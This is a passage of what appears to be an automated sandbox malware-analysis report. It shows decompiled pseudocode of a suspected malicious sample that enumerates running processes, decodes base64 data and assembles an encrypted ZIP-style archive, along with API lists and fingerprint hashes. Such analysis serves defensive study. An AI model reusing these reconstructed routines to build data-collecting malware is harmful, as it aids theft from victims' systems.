                                                                                				 *(_t240 - 0x1f8) = 0;
                                                                                				 *((intOrPtr*)(_t240 - 0x1fc)) =  *((intOrPtr*)(_t240 + 8));
                                                                                				 *((intOrPtr*)(_t240 - 0x58)) = _t239;
                                                                                				 *((intOrPtr*)(_t240 - 0x5c)) = 0;
                                                                                				 *((char*)(_t240 - 0x6c)) = 0;
                                                                                				E00403A16(_t240 - 0x6c, _t245, 0x43e028, 0);
                                                                                				_push(_t240 - 0x2a4);
                                                                                				 *((intOrPtr*)(_t240 - 4)) = 1;
                                                                                				E0041687E(0, _t240 - 0x6c, 1, _t239, _t245);
                                                                                				E00402C34(_t240 - 0x6c, 1, 0);
                                                                                				 *((char*)(_t240 - 4)) = 4;
                                                                                				 *(_t240 - 0x1f0) = 0;
                                                                                				_t228 = 0;
                                                                                				 *(_t240 - 0x1ec) = 0x128;
                                                                                				 *((intOrPtr*)(_t240 - 0x3c)) = _t239;
                                                                                				 *((intOrPtr*)(_t240 - 0x40)) = 0;
                                                                                				 *((char*)(_t240 - 0x50)) = 0;
                                                                                				E00403A16(_t240 - 0x50, _t245, "----------", 0xa);
                                                                                				 *((char*)(_t240 - 4)) = 5;
                                                                                				_t107 = CreateToolhelp32Snapshot(2, 0);
                                                                                				 *(_t240 - 0x1f4) = _t107;
                                                                                				if(Process32First(_t107, _t240 - 0x1ec) != 0) {
                                                                                					while(Process32Next( *(_t240 - 0x1f4), _t240 - 0x1ec) != 0) {
                                                                                						if(_t228 !=  *((intOrPtr*)(_t240 - 0x1d4))) {
                                                                                							__eflags =  *(_t240 - 0x1f0);
                                                                                							if(__eflags != 0) {
                                                                                								 *(_t240 - 0x1f0) = 0;
                                                                                							}
                                                                                							_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                							_t179 = _t240 - 0x88;
                                                                                							_t119 = E00417463(0, _t240 - 0x88, _t224, _t228, _t239, __eflags);
                                                                                							 *((char*)(_t240 - 4)) = 0xd;
                                                                                							_t121 = E0040D3FA(_t240 - 0x88, _t240 - 0xa4, " [", _t119);
                                                                                							 *((char*)(_t240 - 4)) = 0xe;
                                                                                							_t123 = E0040D3C3(_t179, _t240 - 0xc0, _t121, "]");
                                                                                							_t241 = _t241 + 0x18;
                                                                                							_t230 = _t123;
                                                                                							 *((char*)(_t240 - 4)) = 0xf;
                                                                                							_t124 = _t240 - 0x1c8;
                                                                                							 *((intOrPtr*)(_t240 - 0x20)) = _t239;
                                                                                							 *((intOrPtr*)(_t240 - 0x24)) = 0;
                                                                                							 *((char*)(_t240 - 0x34)) = 0;
                                                                                							_t224 = _t124 + 1;
                                                                                							do {
                                                                                								_t180 =  *_t124;
                                                                                								_t124 = _t124 + 1;
                                                                                								__eflags = _t180;
                                                                                							} while (__eflags != 0);
                                                                                							E00403A16(_t240 - 0x34, __eflags, _t240 - 0x1c8, _t124 - _t224);
                                                                                							_push("- ");
                                                                                							_push(_t240 - 0x294);
                                                                                							 *((char*)(_t240 - 4)) = 0x10;
                                                                                							_t129 = E00416DEA(0, _t230, _t239, __eflags);
                                                                                							_push(" ");
                                                                                							_push(_t129);
                                                                                							_push(E00416DEA(0, _t230, _t239, __eflags));
                                                                                							_push(E00416F6B(0, _t240 - 0x34, _t230, _t239, __eflags));
                                                                                							E00415504(0, _t230, _t240, E00416F6B(0, _t230, _t230, _t239, __eflags));
                                                                                							__eflags = 1;
                                                                                							E00402C34(_t240 - 0x34, 1, 0);
                                                                                							E00402C34(_t240 - 0xc0, 1, 0);
                                                                                							E00402C34(_t240 - 0xa4, 1, 0);
                                                                                							 *((char*)(_t240 - 4)) = 5;
                                                                                							E00402C34(_t240 - 0x88, 1, 0);
                                                                                						} else {
                                                                                							_t249 =  *(_t240 - 0x1f0);
                                                                                							if( *(_t240 - 0x1f0) != 0) {
                                                                                								_t233 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									__eflags = _t233 -  *(_t240 - 0x1f0);
                                                                                									if(__eflags > 0) {
                                                                                										break;
                                                                                									}
                                                                                									_push(_t240 - 0x294);
                                                                                									E00416F6B(0, _t240 - 0x50, _t233, _t239, __eflags);
                                                                                									_t233 = _t233 + 1;
                                                                                								}
                                                                                								_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                								_t195 = _t240 - 0xc0;
                                                                                								_t138 = E00417463(0, _t240 - 0xc0, _t224, _t233, _t239, __eflags);
                                                                                								 *((char*)(_t240 - 4)) = 9;
                                                                                								_t140 = E0040D3FA(_t240 - 0xc0, _t240 - 0x88, " [", _t138);
                                                                                								 *((char*)(_t240 - 4)) = 0xa;
                                                                                								_t142 = E0040D3C3(_t195, _t240 - 0xa4, _t140, "]");
                                                                                								_t241 = _t241 + 0x18;
                                                                                								_t234 = _t142;
                                                                                								 *((char*)(_t240 - 4)) = 0xb;
                                                                                								_t143 = _t240 - 0x1c8;
                                                                                								 *((intOrPtr*)(_t240 - 0x20)) = _t239;
                                                                                								 *((intOrPtr*)(_t240 - 0x24)) = 0;
                                                                                								 *((char*)(_t240 - 0x34)) = 0;
                                                                                								_t224 = _t143 + 1;
                                                                                								do {
                                                                                									_t196 =  *_t143;
                                                                                									_t143 = _t143 + 1;
                                                                                									__eflags = _t196;
                                                                                								} while (__eflags != 0);
                                                                                								E00403A16(_t240 - 0x34, __eflags, _t240 - 0x1c8, _t143 - _t224);
                                                                                								_push("---------- ");
                                                                                								_push(_t240 - 0x294);
                                                                                								 *((char*)(_t240 - 4)) = 0xc;
                                                                                								_t148 = E00416DEA(0, _t234, _t239, __eflags);
                                                                                								_push(" ");
                                                                                								_push(_t148);
                                                                                								_push(E00416DEA(0, _t234, _t239, __eflags));
                                                                                								_push(E00416F6B(0, _t240 - 0x34, _t234, _t239, __eflags));
                                                                                								E00415504(0, _t234, _t240, E00416F6B(0, _t234, _t234, _t239, __eflags));
                                                                                								__eflags = 1;
                                                                                								E00402C34(_t240 - 0x34, 1, 0);
                                                                                								E00402C34(_t240 - 0xa4, 1, 0);
                                                                                								E00402C34(_t240 - 0x88, 1, 0);
                                                                                								_push(0);
                                                                                								_push(1);
                                                                                								_t210 = _t240 - 0xc0;
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t240 - 0x1e4)));
                                                                                								_t213 = _t240 - 0xa4;
                                                                                								_t159 = E00417463(0, _t240 - 0xa4, _t224, _t228, _t239, _t249);
                                                                                								 *((char*)(_t240 - 4)) = 6;
                                                                                								_t161 = E0040D3FA(_t240 - 0xa4, _t240 - 0x88, " [", _t159);
                                                                                								 *((char*)(_t240 - 4)) = 7;
                                                                                								_t163 = E0040D3C3(_t213, _t240 - 0x34, _t161, "]");
                                                                                								_t241 = _t241 + 0x18;
                                                                                								_t237 = _t163;
                                                                                								_push("---------- ");
                                                                                								_push(_t240 - 0x294);
                                                                                								 *((char*)(_t240 - 4)) = 8;
                                                                                								_t165 = E00416DEA(0, _t163, _t239, _t249);
                                                                                								_push(_t240 - 0x1c8);
                                                                                								_push(_t165);
                                                                                								_push(E00416DEA(0, _t237, _t239, _t249));
                                                                                								E00415504(0, _t237, _t240, E00416F6B(0, _t237, _t237, _t239, _t249));
                                                                                								E00402C34(_t240 - 0x34, 1, 0);
                                                                                								E00402C34(_t240 - 0x88, 1, 0);
                                                                                								_push(0);
                                                                                								_push(1);
                                                                                								_t210 = _t240 - 0xa4;
                                                                                							}
                                                                                							 *((char*)(_t240 - 4)) = 5;
                                                                                							E00402C34(_t210);
                                                                                							 *(_t240 - 0x1f0) =  *(_t240 - 0x1f0) + 1;
                                                                                						}
                                                                                						_t228 =  *((intOrPtr*)(_t240 - 0x1e4));
                                                                                					}
                                                                                				}
                                                                                				CloseHandle( *(_t240 - 0x1f4));
                                                                                				E00402C34(_t240 - 0x50, 1, 0);
                                                                                				 *((intOrPtr*)(_t240 - 4)) = 3;
                                                                                				_t229 =  *((intOrPtr*)(_t240 - 0x1fc));
                                                                                				_push(_t240 - 0x2a4);
                                                                                				E00416915(0,  *((intOrPtr*)(_t240 - 0x1fc)), _t239, __eflags);
                                                                                				_t95 = _t240 - 0x1f8;
                                                                                				 *_t95 =  *(_t240 - 0x1f8) | 0x00000001;
                                                                                				__eflags =  *_t95;
                                                                                				 *((char*)(_t240 - 4)) = 0;
                                                                                				E0040B593(_t240 - 0x2a4, 0, _t229);
                                                                                				return E00421A70(0, _t229, _t239);
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 004163ED
                                                                                  • Part of subcall function 0041687E: __EH_prolog3.LIBCMT ref: 00416885
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00416471
                                                                                • Process32First.KERNEL32(00000000,00000128), ref: 00416485
                                                                                • Process32Next.KERNEL32 ref: 004164A0
                                                                                  • Part of subcall function 00416DEA: __EH_prolog3_catch.LIBCMT ref: 00416DF1
                                                                                  • Part of subcall function 00416F6B: __EH_prolog3_catch.LIBCMT ref: 00416F72
                                                                                • CloseHandle.KERNEL32(?), ref: 00416780
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog3_catchProcess32_memmove$CloseCreateFirstH_prolog3H_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                • String ID: ----------$----------
                                                                                • API String ID: 4185073159-2385812570
                                                                                • Opcode ID: 1064a9062219d0e46948724279d0d6575eb3925b2edd40008286560525a54c30
                                                                                • Instruction ID: d9db643d32ec5ca3ab43b03c3e7087237b562507825d7b5563a70fabea8574a0
                                                                                • Opcode Fuzzy Hash: 1064a9062219d0e46948724279d0d6575eb3925b2edd40008286560525a54c30
                                                                                • Instruction Fuzzy Hash: DBB19271905158AEEB24EB65DD46FEEBB78AF54308F1040AFF009B7181DAB85F84CB25
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040F4F8
                                                                                • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,00410940,?), ref: 0040F50D
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040F515
                                                                                • _memmove.LIBCMT ref: 0040F56F
                                                                                • lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F585
                                                                                • lstrcat.KERNEL32(0043E028,0043E028), ref: 0040F597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                                • String ID: (C
                                                                                • API String ID: 943939369-3375610692
                                                                                • Opcode ID: d51a0901fab17331e65965b5d1a219e9628814bf6c4862e2e7d9282f13608ef4
                                                                                • Instruction ID: 99b573db7768662b943780cb123125b48d7d8c721c760c2ee258b453a8e7a8d5
                                                                                • Opcode Fuzzy Hash: d51a0901fab17331e65965b5d1a219e9628814bf6c4862e2e7d9282f13608ef4
                                                                                • Instruction Fuzzy Hash: 97310F75900218AFDB21DFA5DC849EEBBBDEF09344F54003AF909E7241EB349919CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0041CB72(signed int __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				signed int _v12;
                                                                                				char _v16;
                                                                                				char _v17;
                                                                                				char _v18;
                                                                                				char _v19;
                                                                                				char _v20;
                                                                                				char _v21;
                                                                                				char _v22;
                                                                                				char _v23;
                                                                                				char _v24;
                                                                                				char _v25;
                                                                                				char _v26;
                                                                                				char _v27;
                                                                                				char _v28;
                                                                                				char _v32;
                                                                                				char _v42;
                                                                                				char _v44;
                                                                                				char _v45;
                                                                                				char _v56;
                                                                                				char _v320;
                                                                                				signed int _v324;
                                                                                				signed int _v328;
                                                                                				char _v336;
                                                                                				char _v596;
                                                                                				char _v856;
                                                                                				signed int _v860;
                                                                                				char* _v864;
                                                                                				char* _v868;
                                                                                				signed int _v1128;
                                                                                				intOrPtr _v1132;
                                                                                				intOrPtr _v1136;
                                                                                				short _v1140;
                                                                                				short _v1142;
                                                                                				short _v1144;
                                                                                				signed int _v1148;
                                                                                				intOrPtr _v1152;
                                                                                				intOrPtr _v1156;
                                                                                				char _v1160;
                                                                                				signed int _v1164;
                                                                                				signed int _v1168;
                                                                                				signed int _v1172;
                                                                                				unsigned int _v1176;
                                                                                				void* _v1178;
                                                                                				signed int _v1180;
                                                                                				short _v1182;
                                                                                				char _v1184;
                                                                                				signed int _v1185;
                                                                                				char _v1186;
                                                                                				signed int _v1192;
                                                                                				void* _v1196;
                                                                                				signed int _v1200;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t223;
                                                                                				intOrPtr* _t225;
                                                                                				char* _t228;
                                                                                				intOrPtr _t229;
                                                                                				intOrPtr* _t230;
                                                                                				short _t234;
                                                                                				signed int _t236;
                                                                                				signed int _t238;
                                                                                				signed int _t247;
                                                                                				signed int _t250;
                                                                                				signed int _t253;
                                                                                				signed int _t255;
                                                                                				signed char _t263;
                                                                                				char _t264;
                                                                                				intOrPtr _t267;
                                                                                				signed int _t269;
                                                                                				void* _t273;
                                                                                				void* _t274;
                                                                                				signed int _t277;
                                                                                				signed int _t278;
                                                                                				signed int _t280;
                                                                                				signed int _t283;
                                                                                				signed int _t288;
                                                                                				signed int _t294;
                                                                                				signed int _t297;
                                                                                				signed int _t298;
                                                                                				intOrPtr* _t299;
                                                                                				void* _t300;
                                                                                				void* _t301;
                                                                                				signed int _t303;
                                                                                				signed int _t306;
                                                                                				signed int _t307;
                                                                                				signed int _t308;
                                                                                				signed int _t331;
                                                                                				signed int _t332;
                                                                                				signed int* _t337;
                                                                                				signed int _t340;
                                                                                				void* _t343;
                                                                                				signed int _t355;
                                                                                				void* _t358;
                                                                                				signed int _t362;
                                                                                				signed int _t364;
                                                                                				signed int _t365;
                                                                                				signed int _t366;
                                                                                				signed int _t369;
                                                                                				void* _t370;
                                                                                				signed char* _t371;
                                                                                				intOrPtr _t373;
                                                                                				signed int _t379;
                                                                                
                                                                                				_t341 = __edx;
                                                                                				_t223 =  *0x447674; // 0x4124c941
                                                                                				_v12 = _t223 ^ _t379;
                                                                                				_t225 = _a4;
                                                                                				_t301 = __edx;
                                                                                				_t363 = 0;
                                                                                				_v1192 = __ecx;
                                                                                				if( *((intOrPtr*)(__edx + 0x14)) == 0) {
                                                                                					__eflags =  *((char*)(__edx + 0x2c));
                                                                                					if( *((char*)(__edx + 0x2c)) == 0) {
                                                                                						_v1200 = 0;
                                                                                						__eflags =  *__edx;
                                                                                						if( *__edx != 0) {
                                                                                							__eflags = _a12 - 4;
                                                                                							if(_a12 != 4) {
                                                                                								_v1200 = 0xc;
                                                                                							}
                                                                                						}
                                                                                						_t341 =  &_v320 - _t225;
                                                                                						__eflags = _t341;
                                                                                						do {
                                                                                							_t303 =  *_t225;
                                                                                							 *((char*)(_t341 + _t225)) = _t303;
                                                                                							_t225 = _t225 + 1;
                                                                                							__eflags = _t303;
                                                                                						} while (_t303 != 0);
                                                                                						__eflags = _v320 - _t303;
                                                                                						if(_v320 == _t303) {
                                                                                							L99:
                                                                                							_t226 = 0x10000;
                                                                                							goto L100;
                                                                                						}
                                                                                						_t228 =  &_v320;
                                                                                						do {
                                                                                							__eflags =  *_t228 - 0x5c;
                                                                                							if( *_t228 == 0x5c) {
                                                                                								 *_t228 = 0x2f;
                                                                                							}
                                                                                							_t228 = _t228 + 1;
                                                                                							__eflags =  *_t228;
                                                                                						} while ( *_t228 != 0);
                                                                                						__eflags = _a12 - 4;
                                                                                						_v1185 = _a12 == 4;
                                                                                						__eflags = _v1185;
                                                                                						if(_v1185 == 0) {
                                                                                							L18:
                                                                                							_v1186 = 0;
                                                                                							L19:
                                                                                							__eflags = _v1185;
                                                                                							_v1196 = 8;
                                                                                							if(_v1185 != 0) {
                                                                                								L21:
                                                                                								_v1196 = _t363;
                                                                                								L22:
                                                                                								_t229 = _a12;
                                                                                								__eflags = _t229 - 2;
                                                                                								if(_t229 != 2) {
                                                                                									__eflags = _t229 - 1;
                                                                                									if(_t229 != 1) {
                                                                                										__eflags = _t229 - 3;
                                                                                										if(_t229 != 3) {
                                                                                											__eflags = _t229 - 4;
                                                                                											if(__eflags != 0) {
                                                                                												goto L99;
                                                                                											}
                                                                                											_t226 = E0041C895(_t301, _t341, __eflags);
                                                                                											L30:
                                                                                											__eflags = _t226;
                                                                                											if(_t226 != 0) {
                                                                                												goto L100;
                                                                                											}
                                                                                											_t32 =  &_v324;
                                                                                											 *_t32 = _v324 & _t226;
                                                                                											__eflags =  *_t32;
                                                                                											_v1128 = _t226;
                                                                                											do {
                                                                                												_t306 =  *((intOrPtr*)(_t379 + _t226 - 0x13c));
                                                                                												 *((char*)(_t379 + _t226 - 0x354)) = _t306;
                                                                                												_t226 = _t226 + 1;
                                                                                												__eflags = _t306;
                                                                                											} while (_t306 != 0);
                                                                                											_t230 =  &_v856;
                                                                                											_t343 = _t230 + 1;
                                                                                											do {
                                                                                												_t307 =  *_t230;
                                                                                												_t230 = _t230 + 1;
                                                                                												__eflags = _t307;
                                                                                											} while (_t307 != 0);
                                                                                											_v1160 = _t230 - _t343;
                                                                                											__eflags = _v1186 - _t307;
                                                                                											if(_v1186 == _t307) {
                                                                                												L39:
                                                                                												_v1142 = 0;
                                                                                												_v1184 = 0xb17;
                                                                                												_t234 = 0x14;
                                                                                												_v1182 = _t234;
                                                                                												_v1176 =  *((intOrPtr*)(_t301 + 0x68));
                                                                                												_t236 = 8;
                                                                                												_v596 = 0;
                                                                                												_v860 = 0;
                                                                                												_v1148 = 0;
                                                                                												_v336 = 1;
                                                                                												_v328 = 0;
                                                                                												_v1172 = 0;
                                                                                												_v1180 = _t236;
                                                                                												_t308 = 9;
                                                                                												__eflags =  *_t301;
                                                                                												if( *_t301 != 0) {
                                                                                													__eflags = _v1185;
                                                                                													if(_v1185 == 0) {
                                                                                														_v1180 = _t308;
                                                                                													}
                                                                                												}
                                                                                												_v1140 = _v1180;
                                                                                												_t238 = _v1196;
                                                                                												_v1178 = _t238;
                                                                                												__eflags = _t238;
                                                                                												if(_t238 != 0) {
                                                                                													L45:
                                                                                													_v1168 = 0;
                                                                                													goto L46;
                                                                                												} else {
                                                                                													_t294 =  *(_t301 + 0x70);
                                                                                													__eflags = _t294;
                                                                                													if(_t294 < 0) {
                                                                                														goto L45;
                                                                                													}
                                                                                													_v1168 = _t294 + _v1200;
                                                                                													L46:
                                                                                													_v1164 =  *(_t301 + 0x70);
                                                                                													_t364 =  *(_t301 + 0x58);
                                                                                													_v1144 = 0;
                                                                                													_v1136 =  *((intOrPtr*)(_t301 + 0x4c));
                                                                                													_v1152 = _t308;
                                                                                													_v1132 =  *(_t301 + 0x18) +  *((intOrPtr*)(_t301 + 0x10));
                                                                                													_v868 =  &_v32;
                                                                                													_v864 =  &_v44;
                                                                                													_v27 =  *(_t301 + 0x58);
                                                                                													_t247 =  *(_t301 + 0x5c);
                                                                                													_v26 = (_t247 << 0x00000020 | _t364) >> 8;
                                                                                													_v25 = (_t247 << 0x00000020 | _t364) >> 0x10;
                                                                                													_t365 =  *(_t301 + 0x50);
                                                                                													_v24 = (_t247 << 0x00000020 | _t364) >> 0x18;
                                                                                													_v23 =  *(_t301 + 0x50);
                                                                                													_t250 =  *(_t301 + 0x54);
                                                                                													_v22 = (_t250 << 0x00000020 | _t365) >> 8;
                                                                                													_v21 = (_t250 << 0x00000020 | _t365) >> 0x10;
                                                                                													_t366 =  *(_t301 + 0x60);
                                                                                													_v20 = (_t250 << 0x00000020 | _t365) >> 0x18;
                                                                                													_v19 =  *(_t301 + 0x60);
                                                                                													_t253 =  *(_t301 + 0x64);
                                                                                													_v18 = (_t253 << 0x00000020 | _t366) >> 8;
                                                                                													_t355 = _t253;
                                                                                													_v17 = (_t355 << 0x00000020 | _t366) >> 0x10;
                                                                                													_v32 = 0xd5455;
                                                                                													_v28 = 7;
                                                                                													_v16 = (_t253 << 0x00000020 | _t366) >> 0x18;
                                                                                													asm("movsd");
                                                                                													asm("movsd");
                                                                                													asm("movsb");
                                                                                													_t356 = _t301;
                                                                                													_v1156 = 0x11;
                                                                                													_t341 = _t355 >> 0x10;
                                                                                													_v42 = 5;
                                                                                													_t255 = E0041B653(_t301, (_t253 << 0x00000020 | _t366) >> 0x18, _t301,  &_v1184);
                                                                                													__eflags = _t255;
                                                                                													if(_t255 == 0) {
                                                                                														 *(_t301 + 0x18) =  *(_t301 + 0x18) + _v1156 + _v1160 + 0x1e;
                                                                                														__eflags =  *(_t301 + 0x14);
                                                                                														if( *(_t301 + 0x14) == 0) {
                                                                                															_t369 =  *_t301;
                                                                                															_t328 = _t301 + 0x30;
                                                                                															 *((intOrPtr*)(_t301 + 0x30)) = 0x12345678;
                                                                                															 *((intOrPtr*)(_t301 + 0x34)) = 0x23456789;
                                                                                															 *((intOrPtr*)(_t301 + 0x38)) = 0x34567890;
                                                                                															__eflags = _t369;
                                                                                															if(_t369 == 0) {
                                                                                																L54:
                                                                                																__eflags =  *0x44a434;
                                                                                																if( *0x44a434 == 0) {
                                                                                																	_t288 = GetTickCount();
                                                                                																	__eflags = _t288 ^ GetDesktopWindow();
                                                                                																	E0041F58A(_t288 ^ GetDesktopWindow());
                                                                                																}
                                                                                																_t370 = 0;
                                                                                																__eflags = 0;
                                                                                																do {
                                                                                																	 *((char*)(_t379 + _t370 - 0x34)) = E0041F59C(__eflags) >> 7;
                                                                                																	_t370 = _t370 + 1;
                                                                                																	__eflags = _t370 - 0xc;
                                                                                																} while (__eflags < 0);
                                                                                																_v45 = _v1176 >> 8;
                                                                                																_t358 = 0;
                                                                                																__eflags = 0;
                                                                                																do {
                                                                                																	_t371 = _t379 + _t358 - 0x34;
                                                                                																	_t263 = E0041C035(_t301 + 0x30, __eflags,  *_t371 & 0x000000ff);
                                                                                																	_t358 = _t358 + 1;
                                                                                																	_pop(_t330);
                                                                                																	 *_t371 = _t263;
                                                                                																	__eflags = _t358 - 0xc;
                                                                                																} while (__eflags < 0);
                                                                                																__eflags =  *_t301;
                                                                                																if( *_t301 != 0) {
                                                                                																	__eflags = _v1185;
                                                                                																	if(_v1185 == 0) {
                                                                                																		_t330 = _t301;
                                                                                																		E0041C4B8(_t301,  &_v56, 0xc);
                                                                                																		_t166 = _t301 + 0x18;
                                                                                																		 *_t166 =  *(_t301 + 0x18) + 0xc;
                                                                                																		__eflags =  *_t166;
                                                                                																	}
                                                                                																}
                                                                                																_v1192 = 0;
                                                                                																__eflags =  *_t301;
                                                                                																if( *_t301 == 0) {
                                                                                																	L66:
                                                                                																	_t264 = 0;
                                                                                																	__eflags = 0;
                                                                                																	goto L67;
                                                                                																} else {
                                                                                																	__eflags = _v1185;
                                                                                																	if(_v1185 != 0) {
                                                                                																		goto L66;
                                                                                																	}
                                                                                																	_t264 = 1;
                                                                                																	L67:
                                                                                																	__eflags = _v1185;
                                                                                																	_t356 = _v1196;
                                                                                																	 *((char*)(_t301 + 0x2d)) = _t264;
                                                                                																	if(_v1185 != 0) {
                                                                                																		 *(_t301 + 0x90) = 0;
                                                                                																		L74:
                                                                                																		_t363 = _t301;
                                                                                																		 *((char*)(_t301 + 0x2d)) = 0;
                                                                                																		E0041C9D4(_t301);
                                                                                																		_t331 =  *(_t301 + 0x90);
                                                                                																		_t226 =  *(_t301 + 0x14);
                                                                                																		 *(_t301 + 0x18) =  *(_t301 + 0x18) + _t331;
                                                                                																		__eflags = _t226;
                                                                                																		if(_t226 != 0) {
                                                                                																			goto L100;
                                                                                																		}
                                                                                																		__eflags = _v1192 - _t226;
                                                                                																		if(_v1192 != _t226) {
                                                                                																			L48:
                                                                                																			_t226 = 0x400;
                                                                                																			goto L100;
                                                                                																		}
                                                                                																		_t341 =  *(_t301 + 0x78);
                                                                                																		_t267 = _v1200 + _t331;
                                                                                																		__eflags = _v1168 - _t267;
                                                                                																		_v1168 = _t267;
                                                                                																		_t332 = _t331 & 0xffffff00 | _v1168 == _t267;
                                                                                																		__eflags =  *((char*)(_t301 + 0x1c));
                                                                                																		_v1172 =  *(_t301 + 0x78);
                                                                                																		_v1164 =  *(_t301 + 0x70);
                                                                                																		if( *((char*)(_t301 + 0x1c)) == 0) {
                                                                                																			L86:
                                                                                																			__eflags = _v1178 - _t356;
                                                                                																			if(_v1178 == _t356) {
                                                                                																				__eflags = _t356;
                                                                                																				if(_t356 != 0) {
                                                                                																					L90:
                                                                                																					_t356 = _t301;
                                                                                																					_t363 =  &_v1184;
                                                                                																					_t269 = E0041B8B5(_t332, _t301,  &_v1184);
                                                                                																					__eflags = _t269;
                                                                                																					if(_t269 != 0) {
                                                                                																						goto L48;
                                                                                																					}
                                                                                																					_t208 = _t301 + 0x18;
                                                                                																					 *_t208 =  *(_t301 + 0x18) + 0x10;
                                                                                																					__eflags =  *_t208;
                                                                                																					_v1180 = _v1140;
                                                                                																					L92:
                                                                                																					_t226 =  *(_t301 + 0x14);
                                                                                																					__eflags =  *(_t301 + 0x14);
                                                                                																					if(__eflags != 0) {
                                                                                																						goto L100;
                                                                                																					}
                                                                                																					_t373 = E0041EB16(_t301, _t341, _t356, _t363, __eflags, _v1152);
                                                                                																					E00421230(_t373, _v864, _v1152);
                                                                                																					_v864 = _t373;
                                                                                																					_t273 = E0041EB16(_t301, _t341, _t356, _t373, __eflags, 0x360);
                                                                                																					_t363 =  &_v1184;
                                                                                																					_t274 = memcpy(_t273, _t363, 0xd8 << 2);
                                                                                																					_t356 = _t363 + 0x1b0;
                                                                                																					_t341 =  *(_t301 + 0x44);
                                                                                																					__eflags = _t341;
                                                                                																					if(_t341 != 0) {
                                                                                																						while(1) {
                                                                                																							_t220 = _t341 + 0x35c; // 0x360
                                                                                																							_t337 = _t220;
                                                                                																							__eflags =  *_t337;
                                                                                																							if( *_t337 == 0) {
                                                                                																								break;
                                                                                																							}
                                                                                																							_t341 =  *_t337;
                                                                                																						}
                                                                                																						 *(_t341 + 0x35c) = _t274;
                                                                                																						L98:
                                                                                																						_t226 = 0;
                                                                                																						goto L100;
                                                                                																					}
                                                                                																					 *(_t301 + 0x44) = _t274;
                                                                                																					goto L98;
                                                                                																				}
                                                                                																				__eflags = _t332;
                                                                                																				if(_t332 == 0) {
                                                                                																					goto L87;
                                                                                																				}
                                                                                																				goto L90;
                                                                                																			}
                                                                                																			L87:
                                                                                																			_t226 = 0x4000000;
                                                                                																			goto L100;
                                                                                																		}
                                                                                																		__eflags =  *_t301;
                                                                                																		if( *_t301 == 0) {
                                                                                																			L79:
                                                                                																			__eflags = _v1180 & 0x00000001;
                                                                                																			_v1178 = _t356;
                                                                                																			if((_v1180 & 0x00000001) == 0) {
                                                                                																				_t197 =  &_v1180;
                                                                                																				 *_t197 = _v1180 & 0x0000fff7;
                                                                                																				__eflags =  *_t197;
                                                                                																			}
                                                                                																			_t363 = _v1132 -  *((intOrPtr*)(_t301 + 0x10));
                                                                                																			_v1140 = _v1180;
                                                                                																			_t277 = E0041C585(_t301, _v1132 -  *((intOrPtr*)(_t301 + 0x10)));
                                                                                																			__eflags = _t277;
                                                                                																			if(_t277 != 0) {
                                                                                																				_t356 = _t301;
                                                                                																				_t363 =  &_v1184;
                                                                                																				_t278 = E0041B653(_t301, _t332, _t301,  &_v1184);
                                                                                																				__eflags = _t278;
                                                                                																				if(_t278 != 0) {
                                                                                																					goto L48;
                                                                                																				}
                                                                                																				_t363 =  *(_t301 + 0x18);
                                                                                																				_t280 = E0041C585(_t301,  *(_t301 + 0x18));
                                                                                																				__eflags = _t280;
                                                                                																				if(_t280 != 0) {
                                                                                																					goto L92;
                                                                                																				}
                                                                                																				goto L82;
                                                                                																			} else {
                                                                                																				L82:
                                                                                																				_t226 = 0x2000000;
                                                                                																				goto L100;
                                                                                																			}
                                                                                																		}
                                                                                																		__eflags = _v1185;
                                                                                																		if(_v1185 == 0) {
                                                                                																			goto L86;
                                                                                																		}
                                                                                																		goto L79;
                                                                                																	}
                                                                                																	__eflags = _t356 - 8;
                                                                                																	if(_t356 != 8) {
                                                                                																		__eflags = _t356;
                                                                                																		if(__eflags != 0) {
                                                                                																			goto L74;
                                                                                																		}
                                                                                																		_t283 = E0041CB1A(_t301, _t330, __eflags);
                                                                                																		L72:
                                                                                																		_v1192 = _t283;
                                                                                																		goto L74;
                                                                                																	}
                                                                                																	_t283 = E0041CA15(_t301,  &_v1184);
                                                                                																	goto L72;
                                                                                																}
